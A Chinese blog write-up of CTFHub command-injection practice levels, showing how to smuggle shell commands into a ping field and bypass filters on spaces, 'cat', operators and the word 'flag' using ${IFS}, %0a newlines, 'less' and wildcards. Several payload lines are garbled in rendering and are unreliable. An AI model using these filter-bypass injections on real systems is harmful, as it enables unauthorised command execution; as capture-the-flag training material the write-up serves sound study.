热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

ctfhub>命令注入练习

ctfhub-web练习–各种绕过1.这题没有任何过滤直接127.0.0.1;ls获取目录,找到flag,然后catflag在注释里面。2.这题过

ctfhub-web练习–>各种绕过

1.这题没有任何过滤
在这里插入图片描述
直接127.0.0.1;ls获取目录,找到flag,然后cat
在这里插入图片描述

在这里插入图片描述flag在注释里面。
2.这题过滤了cat
在这里插入图片描述
百度下php类cat方法:
在这里插入图片描述

127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag
在这里插入图片描述
3.过滤空格
在这里插入图片描述
IFS绕过127.0.0.1;cat{IFS}绕过 127.0.0.1;catIFS127.0.0.1;cat{IFS}flag_1630334994276.php

在这里插入图片描述
4.过滤目录分隔符
在这里插入图片描述先看看目录
127.0.0.1;ls
在这里插入图片描述然后看看flag_is_here目录里面有什么
127.0.0.1;ls flag_is_here

在这里插入图片描述

有flag,但是不在当前目录下,所以切换目录就行了
127.0.0.1;cd \flag_is_here;cat flag_160862057427113.php
在这里插入图片描述5.过滤运算符
在这里插入图片描述
过滤了| 和&
但是没有过滤 ; …
送分题
;ls;cat flag_17341506416268.php

在这里插入图片描述6.组合拳
在这里插入图片描述过滤了|,&,;,空格,cat,flag,ctfhub
这能难到我吗???
综合前面的
${IFS} -->空格
%0a(换行) --> ;
less --> cat
而且在url中提交才行
因为在输入框中提交会再进行url编码,意思就不是我们想要的了
先127.0.0.1%0als#看看目录

在这里插入图片描述

再127.0.0.1%0als${IFS}fla*#
看看有啥玩意

在这里插入图片描述
因为过滤了flag,所以要用fla*
然后127.0.0.1%0acdIFSfla∗{IFS}fla*%0alessIFSfla{IFS}fla*.php#获取flag
在这里插入图片描述
简便方法:
127.0.0.1%0acdIFSfla∗{IFS}fla*%0alessIFSfla{IFS}*.php#
因为根据前面几题都知道目录和flag都叫什么类型的名字了。。。。。。。


推荐阅读
  • ABP框架是ASP.NET Boilerplate的简称,它不仅是一个开源且文档丰富的应用程序框架,还提供了一套基于领域驱动设计(DDD)的最佳实践架构模型。本文将详细介绍ABP框架的特点、项目结构及其在Web API优先架构中的应用。 ... [详细]
  • 本文将详细探讨PHP中C的作用,并对比其他编程语言如Java和C的特点及其适用场景。 ... [详细]
  • PHP函数的工作原理与性能分析
    在编程语言中,函数是最基本的组成单元。本文将探讨PHP函数的特点、调用机制以及性能表现,并通过实际测试给出优化建议。 ... [详细]
  • web页面报表js下载,web报表软件 ... [详细]
  • 本文讲述了一位80后的普通男性程序员,尽管没有高学历,但通过不断的努力和学习,在IT行业中逐渐找到了自己的位置。从最初的仓库管理员到现在的多技能开发者,他的职业生涯充满了挑战与机遇。 ... [详细]
  • MyBatisCodeHelperPro 2.9.3 最新在线免费激活方法
    MyBatisCodeHelperPro 2.9.3 是一款强大的代码生成工具,适用于多种开发环境。本文将介绍如何在线免费激活该工具,帮助开发者提高工作效率。 ... [详细]
  • 开发笔记:前端之前端初识
    开发笔记:前端之前端初识 ... [详细]
  • 我自己做了一个网站图片的抓取,感觉速度有点慢抓取4000张图片可能得用15分钟左右的时间,我百度看用线程可以加快抓取,然后创建了5个线程抓取,但是5个线程是同步执行同样的操作一个图片就 ... [详细]
  • 本文探讨了 Java 中 HttpClient 和 HtmlUnit 的区别,重点介绍了它们的功能和应用场景。 ... [详细]
  • 2023年最新指南:如何在PHP中屏蔽警告和错误
    本文详细介绍了如何在PHP中屏蔽警告和错误,包括多种方法和最佳实践,帮助开发者提升代码质量和安全性。 ... [详细]
  • Java EE 平台集成了多种服务、API 和协议,旨在支持基于 Web 的多层应用程序开发。本文将详细介绍 Java EE 中的 13 种关键技术规范,帮助开发者更好地理解和应用这些技术。 ... [详细]
  • 本文为初学者提供了一条清晰的学习路线,帮助他们逐步成长为优秀的Web开发人员。通过十个关键步骤,涵盖从基础到高级的各个方面,确保每位学习者都能找到适合自己的学习方向。 ... [详细]
  • PHP本地服务器搭建补充说明
    由于某些需求,我重新搭建了本地Web服务器,并发现之前的博客中存在一些遗漏。为了帮助读者更好地理解和操作,特此撰写本文进行补充。 ... [详细]
  • 本文介绍了如何使用Postman构建和发送HTTP请求,包括四个主要部分:方法(Method)、URL、头部(Headers)和主体(Body)。特别强调了Body部分的重要性,并详细说明了不同类型的请求体。 ... [详细]
  • Bootstrap 插件使用指南
    本文详细介绍了如何在 Web 前端开发中使用 Bootstrap 插件,包括自动触发插件的方法、插件的引用方式以及具体的实例。 ... [详细]
author-avatar
撒药拿拉的唐小妄
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有